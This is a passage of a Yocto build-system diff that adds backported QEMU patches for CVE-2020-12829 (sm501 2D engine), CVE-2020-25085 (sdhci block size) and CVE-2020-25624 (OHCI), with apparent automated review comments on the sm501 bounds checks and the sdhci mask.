@@ -0,0 +1,139 @@ +From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation + +This increases readability and cleans up some confusing naming. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 45 ++++++++++++++++++++++----------------------- + 1 file changed, 22 insertions(+), 23 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index bd3ccfe311..f42d05e1e4 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt) + static void sm501_2d_operation(SM501State *s) + { + /* obtain operation parameters */ +- int operation = (s->twoD_control >> 16) & 0x1f; ++ int cmd = (s->twoD_control >> 16) & 0x1F; + int rtl = s->twoD_control & 0x8000000; + int src_x = (s->twoD_source >> 16) & 0x01FFF; + int src_y = s->twoD_source & 0xFFFF; + int dst_x = (s->twoD_destination >> 16) & 0x01FFF; + int dst_y = s->twoD_destination & 0xFFFF; +- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF; +- int operation_height = s->twoD_dimension & 0xFFFF; ++ int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ int height = s->twoD_dimension & 0xFFFF; + uint32_t color = s->twoD_foreground; +- int format_flags = (s->twoD_stretch >> 20) & 0x3; +- int addressing = (s->twoD_stretch >> 16) & 0xF; ++ int format = (s->twoD_stretch >> 20) & 0x3; + int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */ + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; +@@ 
-721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s) + /* get frame buffer info */ + uint8_t *src = s->local_mem + src_base; + uint8_t *dst = s->local_mem + dst_base; +- int src_width = s->twoD_pitch & 0x1FFF; +- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF; ++ int src_pitch = s->twoD_pitch & 0x1FFF; ++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + +- if (addressing != 0x0) { ++ if ((s->twoD_stretch >> 16) & 0xF) { + qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n"); + return; + } +@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s) + return; + } + +- switch (operation) { ++ switch (cmd) { + case 0x00: /* copy area */ + #define COPY_AREA(_bpp, _pixel_type, rtl) { \ + int y, x, index_d, index_s; \ +- for (y = 0; y < operation_height; y++) { \ +- for (x = 0; x < operation_width; x++) { \ ++ for (y = 0; y < height; y++) { \ ++ for (x = 0; x < width; x++) { \ + _pixel_type val; \ + \ + if (rtl) { \ +- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \ +- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \ ++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \ ++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \ + } else { \ +- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \ +- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \ ++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \ ++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ + } \ + if (rop_mode == 1 && rop == 5) { \ + /* Invert dest */ \ +@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s) + } \ + } \ + } +- switch (format_flags) { ++ switch (format) { + case 0: + COPY_AREA(1, uint8_t, rtl); + break; +@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s) + case 0x01: /* fill rectangle */ + #define FILL_RECT(_bpp, _pixel_type) { \ + 
int y, x; \ +- for (y = 0; y < operation_height; y++) { \ +- for (x = 0; x < operation_width; x++) { \ +- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \ ++ for (y = 0; y < height; y++) { \ ++ for (x = 0; x < width; x++) { \ ++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ + *(_pixel_type *)&dst[index] = (_pixel_type)color; \ + } \ + } \ + } + +- switch (format_flags) { ++ switch (format) { + case 0: + FILL_RECT(1, uint8_t); + break; +@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s) + + default: + qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", +- operation); ++ cmd); + return; + } + + if (dst_base >= get_fb_addr(s, crt) && + dst_base <= get_fb_addr(s, crt) + fb_len) { +- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width + +- dst_x + operation_width) * (1 << format_flags)); ++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch + ++ dst_x + width) * (1 << format)); + if (dst_len) { + memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len); + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch new file mode 100644 index 0000000000..c647028cfe --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch 
@@ -0,0 +1,47 @@ +From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#3 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 5 ++--- + 1 file changed, 2 insertions(+), 3 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index f42d05e1e4..97660090bb 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s) + { + /* obtain operation parameters */ + int cmd = (s->twoD_control >> 16) & 0x1F; +- int rtl = s->twoD_control & 0x8000000; ++ int rtl = s->twoD_control & BIT(27); + int src_x = (s->twoD_source >> 16) & 0x01FFF; + int src_y = s->twoD_source & 0xFFFF; + int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s) + } + } + +- if ((s->twoD_source_base & 0x08000000) || +- (s->twoD_destination_base & 0x08000000)) { ++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) { + qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); + return; + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch new file mode 100644 index 0000000000..485af05e1e --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch 
@@ -0,0 +1,100 @@ +From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Make variables local to the block they are used in to make it clearer +which operation they are needed for. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#4 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 31 ++++++++++++++++--------------- + 1 file changed, 16 insertions(+), 15 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index 97660090bb..5ed57703d8 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt) + + static void sm501_2d_operation(SM501State *s) + { +- /* obtain operation parameters */ + int cmd = (s->twoD_control >> 16) & 0x1F; + int rtl = s->twoD_control & BIT(27); +- int src_x = (s->twoD_source >> 16) & 0x01FFF; +- int src_y = s->twoD_source & 0xFFFF; +- int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +- int dst_y = s->twoD_destination & 0xFFFF; +- int width = (s->twoD_dimension >> 16) & 0x1FFF; +- int height = s->twoD_dimension & 0xFFFF; +- uint32_t color = s->twoD_foreground; + int format = (s->twoD_stretch >> 20) & 0x3; + int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */ + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; + int rop = s->twoD_control & 0xFF; +- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; 
++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF; ++ int dst_y = s->twoD_destination & 0xFFFF; ++ int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ int height = s->twoD_dimension & 0xFFFF; + uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF; +- +- /* get frame buffer info */ +- uint8_t *src = s->local_mem + src_base; + uint8_t *dst = s->local_mem + dst_base; +- int src_pitch = s->twoD_pitch & 0x1FFF; + int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); +@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s) + + switch (cmd) { + case 0x00: /* copy area */ ++ { ++ int src_x = (s->twoD_source >> 16) & 0x01FFF; ++ int src_y = s->twoD_source & 0xFFFF; ++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; ++ uint8_t *src = s->local_mem + src_base; ++ int src_pitch = s->twoD_pitch & 0x1FFF; ++ + #define COPY_AREA(_bpp, _pixel_type, rtl) { \ + int y, x, index_d, index_s; \ + for (y = 0; y < height; y++) { \ +@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s) + break; + } + break; +- ++ } + case 0x01: /* fill rectangle */ ++ { ++ uint32_t color = s->twoD_foreground; ++ + #define FILL_RECT(_bpp, _pixel_type) { \ + int y, x; \ + for (y = 0; y < height; y++) { \ +@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s) + break; + } + break; +- ++ } + default: + qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", + cmd); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch new file mode 100644 index 0000000000..ab09e8b039 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch 
@@ -0,0 +1,266 @@ +From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman + where possible + +Besides being faster this should also prevent malicious guests to +abuse 2D engine to overwrite data or cause a crash. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 207 ++++++++++++++++++++++++++------------------- + 1 file changed, 119 insertions(+), 88 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index 5ed57703d8..8bf4d111f4 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s) + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; + int rop = s->twoD_control & 0xFF; +- int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +- int dst_y = s->twoD_destination & 0xFFFF; +- int width = (s->twoD_dimension >> 16) & 0x1FFF; +- int height = s->twoD_dimension & 0xFFFF; ++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF; ++ unsigned int dst_y = s->twoD_destination & 0xFFFF; ++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ unsigned int height = s->twoD_dimension & 0xFFFF; + uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF; +- uint8_t *dst = s->local_mem + dst_base; +- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; ++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 
1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + +@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s) + return; + } + +- if (rop_mode == 0) { +- if (rop != 0xcc) { +- /* Anything other than plain copies are not supported */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not " +- "supported.\n", rop); +- } +- } else { +- if (rop2_source_is_pattern && rop != 0x5) { +- /* For pattern source, we support only inverse dest */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and " +- "rop %x is not supported.\n", rop); +- } else { +- if (rop != 0x5 && rop != 0xc) { +- /* Anything other than plain copies or inverse dest is not +- * supported */ +- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not " +- "supported.\n", rop); +- } +- } +- } +- + if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) { + qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); + return; + } + ++ if (!dst_pitch) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n"); ++ return; ++ } ++ ++ if (!width || !height) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n"); ++ return; ++ } ++ ++ if (rtl) { ++ dst_x -= width - 1; ++ dst_y -= height - 1; ++ } ++ ++ if (dst_base >= get_local_mem_size(s) || dst_base + ++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) * ++ (1 << format) >= get_local_mem_size(s)) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n"); ++ return; ++ } ++ + switch (cmd) { +- case 0x00: /* copy area */ ++ case 0: /* BitBlt */ + { +- int src_x = (s->twoD_source >> 16) & 0x01FFF; +- int src_y = s->twoD_source & 0xFFFF; ++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF; ++ unsigned int src_y = s->twoD_source & 0xFFFF; + uint32_t src_base = s->twoD_source_base & 0x03FFFFFF; +- uint8_t *src = s->local_mem + src_base; +- int src_pitch = s->twoD_pitch & 0x1FFF; +- +-#define COPY_AREA(_bpp, _pixel_type, rtl) { \ +- 
int y, x, index_d, index_s; \ +- for (y = 0; y < height; y++) { \ +- for (x = 0; x < width; x++) { \ +- _pixel_type val; \ +- \ +- if (rtl) { \ +- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \ +- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \ +- } else { \ +- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \ +- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ +- } \ +- if (rop_mode == 1 && rop == 5) { \ +- /* Invert dest */ \ +- val = ~*(_pixel_type *)&dst[index_d]; \ +- } else { \ +- val = *(_pixel_type *)&src[index_s]; \ +- } \ +- *(_pixel_type *)&dst[index_d] = val; \ +- } \ +- } \ +- } +- switch (format) { +- case 0: +- COPY_AREA(1, uint8_t, rtl); +- break; +- case 1: +- COPY_AREA(2, uint16_t, rtl); +- break; +- case 2: +- COPY_AREA(4, uint32_t, rtl); +- break; ++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF; ++ ++ if (!src_pitch) { ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n"); ++ return; ++ } ++ ++ if (rtl) { ++ src_x -= width - 1; ++ src_y -= height - 1; ++ } ++ ++ if (src_base >= get_local_mem_size(s) || src_base + ++ (src_x + width + (src_y + height) * (src_pitch + width)) * ++ (1 << format) >= get_local_mem_size(s)) { ++ qemu_log_mask(LOG_GUEST_ERROR, ++ "sm501: 2D op src is outside vram.\n"); ++ return; ++ } ++ ++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) { ++ /* Invert dest, is there a way to do this with pixman? 
*/ ++ unsigned int x, y, i; ++ uint8_t *d = s->local_mem + dst_base; ++ ++ for (y = 0; y < height; y++) { ++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format); ++ for (x = 0; x < width; x++, i += (1 << format)) { ++ switch (format) { ++ case 0: ++ d[i] = ~d[i]; ++ break; ++ case 1: ++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i]; ++ break; ++ case 2: ++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i]; ++ break; ++ } ++ } ++ } ++ } else { ++ /* Do copy src for unimplemented ops, better than unpainted area */ ++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) || ++ (!rop_mode && rop != 0xcc)) { ++ qemu_log_mask(LOG_UNIMP, ++ "sm501: rop%d op %x%s not implemented\n", ++ (rop_mode ? 2 : 3), rop, ++ (rop2_source_is_pattern ? ++ " with pattern source" : "")); ++ } ++ /* Check for overlaps, this could be made more exact */ ++ uint32_t sb, se, db, de; ++ sb = src_base + src_x + src_y * (width + src_pitch); ++ se = sb + width + height * (width + src_pitch); ++ db = dst_base + dst_x + dst_y * (width + dst_pitch); ++ de = db + width + height * (width + dst_pitch); ++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) { ++ /* regions may overlap: copy via temporary */ ++ int llb = width * (1 << format); ++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t)); ++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) * ++ height); ++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp, ++ src_pitch * (1 << format) / sizeof(uint32_t), ++ tmp_stride, 8 * (1 << format), 8 * (1 << format), ++ src_x, src_y, 0, 0, width, height); ++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base], ++ tmp_stride, ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), 8 * (1 << format), ++ 0, 0, dst_x, dst_y, width, height); ++ g_free(tmp); ++ } else { ++ pixman_blt((uint32_t *)&s->local_mem[src_base], ++ (uint32_t *)&s->local_mem[dst_base], ++ src_pitch * (1 << format) / sizeof(uint32_t), ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), 8 * (1 << 
format), ++ src_x, src_y, dst_x, dst_y, width, height); ++ } + } + break; + } +- case 0x01: /* fill rectangle */ ++ case 1: /* Rectangle Fill */ + { + uint32_t color = s->twoD_foreground; + +-#define FILL_RECT(_bpp, _pixel_type) { \ +- int y, x; \ +- for (y = 0; y < height; y++) { \ +- for (x = 0; x < width; x++) { \ +- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ +- *(_pixel_type *)&dst[index] = (_pixel_type)color; \ +- } \ +- } \ +- } +- +- switch (format) { +- case 0: +- FILL_RECT(1, uint8_t); +- break; +- case 1: +- color = cpu_to_le16(color); +- FILL_RECT(2, uint16_t); +- break; +- case 2: ++ if (format == 2) { + color = cpu_to_le32(color); +- FILL_RECT(4, uint32_t); +- break; ++ } else if (format == 1) { ++ color = cpu_to_le16(color); + } ++ ++ pixman_fill((uint32_t *)&s->local_mem[dst_base], ++ dst_pitch * (1 << format) / sizeof(uint32_t), ++ 8 * (1 << format), dst_x, dst_y, width, height, color); + break; + } + default: +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch new file mode 100644 index 0000000000..be19256cef --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch 
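Review bot: The new destination and source range checks in `sm501_2d_operation` are computed in 32-bit `unsigned int`, and in the `rtl` case they run after `dst_x -= width - 1` / `dst_y -= height - 1` (and the `src_x`/`src_y` equivalents), which wrap when the extent exceeds the coordinate. A wrapped coordinate, or a wrapped product once `(dst_y + height) * (dst_pitch + width)` is scaled by `(1 << format)`, may let the `>= get_local_mem_size(s)` comparison pass for a rectangle that is not inside VRAM. Reject the underflow before subtracting, e.g. `if (rtl && (dst_x < width - 1 || dst_y < height - 1)) { return; }`, and do the size arithmetic in `uint64_t`. Separately, the previous patch in this series shows `format` masked with `0x3`, so the value 3 can reach `8 * (1 << format)`, and because the `pixman_blt()`/`pixman_fill()` return values are ignored an unsupported depth would fail silently. The function starts and ends outside this hunk.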
@@ -0,0 +1,46 @@ +From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org> +Date: Tue, 1 Sep 2020 15:22:06 +0200 +Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The 'Transfer Block Size' field is 12-bit wide. + +See section '2.2.2. Block Size Register (Offset 004h)' in datasheet. + +Two different bug reproducer available: +- https://bugs.launchpad.net/qemu/+bug/1892960 +- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1 + +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1892960 +Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller") +Reported-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org> +Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org> +Tested-by: Alexander Bulekov <alxndr@bu.edu> +Message-Id: <20200901140411.112150-3-f4bug@amsat.org> + +Upstream-Status: Backport +CVE: CVE-2020-25085 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/sd/sdhci.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/sd/sdhci.c +=================================================================== +--- qemu-4.2.0.orig/hw/sd/sdhci.c ++++ qemu-4.2.0/hw/sd/sdhci.c +@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset, + break; + case SDHC_BLKSIZE: + if (!TRANSFERRING_DATA(s->prnsts)) { +- MASKED_WRITE(s->blksize, mask, value); ++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12)); + MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16); + } + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch new file mode 100644 index 0000000000..a46b5be193 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch 
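Review bot: The literal `12` in `extract32(value, 0, 12)` is unexplained at the call site; the reason appears only in the patch description. A short comment such as `/* Transfer Block Size is a 12-bit field (spec section 2.2.2) */` above the `MASKED_WRITE(s->blksize, ...)` line would keep the constraint next to the code. The mask limits the value to 4095, but this hunk does not show whether `s->blksize` is also bounded against the controller's data buffer size elsewhere, which is worth confirming. The enclosing `sdhci_write` starts and ends outside the hunk.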
@@ -0,0 +1,87 @@ +From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001 +From: Guenter Roeck <linux@roeck-us.net> +Date: Mon, 17 Feb 2020 12:48:10 -0800 +Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI + to include file + +We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it +to its include file. + +Reviewed-by: Gerd Hoffmann <kraxel@redhat.com> +Signed-off-by: Guenter Roeck <linux@roeck-us.net> +Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com> +Message-id: 20200217204812.9857-2-linux@roeck-us.net +Signed-off-by: Peter Maydell <peter.maydell@linaro.org> + +Upstream-Status: Backport +CVE: CVE-2020-25624 patch #1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/usb/hcd-ohci.c | 15 --------------- + hw/usb/hcd-ohci.h | 16 ++++++++++++++++ + 2 files changed, 16 insertions(+), 15 deletions(-) + +diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c +index 8a94bd004a..1e6e85e86a 100644 +--- a/hw/usb/hcd-ohci.c ++++ b/hw/usb/hcd-ohci.c +@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci) + ohci_bus_stop(ohci); + } + +-#define TYPE_SYSBUS_OHCI "sysbus-ohci" +-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI) +- +-typedef struct { +- /*< private >*/ +- SysBusDevice parent_obj; +- /*< public >*/ +- +- OHCIState ohci; +- char *masterbus; +- uint32_t num_ports; +- uint32_t firstport; +- dma_addr_t dma_offset; +-} OHCISysBusState; +- + static void ohci_realize_pxa(DeviceState *dev, Error **errp) + { + OHCISysBusState *s = SYSBUS_OHCI(dev); +diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h +index 16e3f1e13a..5c8819aedf 100644 +--- a/hw/usb/hcd-ohci.h ++++ b/hw/usb/hcd-ohci.h +@@ -22,6 +22,7 @@ + #define HCD_OHCI_H + + #include "sysemu/dma.h" ++#include "hw/usb.h" + + /* Number of Downstream Ports on the root hub: */ + #define OHCI_MAX_PORTS 15 +@@ -90,6 +91,21 @@ typedef struct OHCIState { + void (*ohci_die)(struct OHCIState *ohci); + } OHCIState; + 
++#define TYPE_SYSBUS_OHCI "sysbus-ohci" ++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI) ++ ++typedef struct { ++ /*< private >*/ ++ SysBusDevice parent_obj; ++ /*< public >*/ ++ ++ OHCIState ohci; ++ char *masterbus; ++ uint32_t num_ports; ++ uint32_t firstport; ++ dma_addr_t dma_offset; ++} OHCISysBusState; ++ + extern const VMStateDescription vmstate_ohci_state; + + void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports, +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch new file mode 100644 index 0000000000..8c1275b2f4 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch 
@@ -0,0 +1,101 @@ +From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit <pjp@fedoraproject.org> +Date: Tue, 15 Sep 2020 23:52:58 +0530 +Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables + +While servicing the OHCI transfer descriptors(TD), OHCI host +controller derives variables 'start_addr', 'end_addr', 'len' +etc. from values supplied by the host controller driver. +Host controller driver may supply values such that using +above variables leads to out-of-bounds access issues. +Add checks to avoid them. + +AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0 + READ of size 2 at 0x7ffd53af76a0 thread T0 + #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734 + #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180 + #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214 + #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257 + #4 timerlist_run_timers ../util/qemu-timer.c:572 + #5 qemu_clock_run_timers ../util/qemu-timer.c:586 + #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672 + #7 main_loop_wait ../util/main-loop.c:527 + #8 qemu_main_loop ../softmmu/vl.c:1676 + #9 main ../softmmu/main.c:50 + +Reported-by: Gaoning Pan <pgn@zju.edu.cn> +Reported-by: Yongkang Jia <j_kangel@163.com> +Reported-by: Yi Ren <yunye.ry@alibaba-inc.com> +Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org> +Message-id: 20200915182259.68522-2-ppandit@redhat.com +Signed-off-by: Gerd Hoffmann 